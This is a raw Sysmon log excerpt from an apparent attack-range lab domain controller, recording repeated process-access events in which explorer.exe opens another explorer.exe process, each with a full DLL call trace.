22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694693Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694692Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694691Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694690Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694689Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694688Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694687Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694686Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694685Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694684Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694683Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694682Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694681Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694680Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694679Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694678Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694677Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694676Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694675Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694674Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694673Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694672Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694671Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694670Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694669Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694668Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694667Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.176{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694666Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 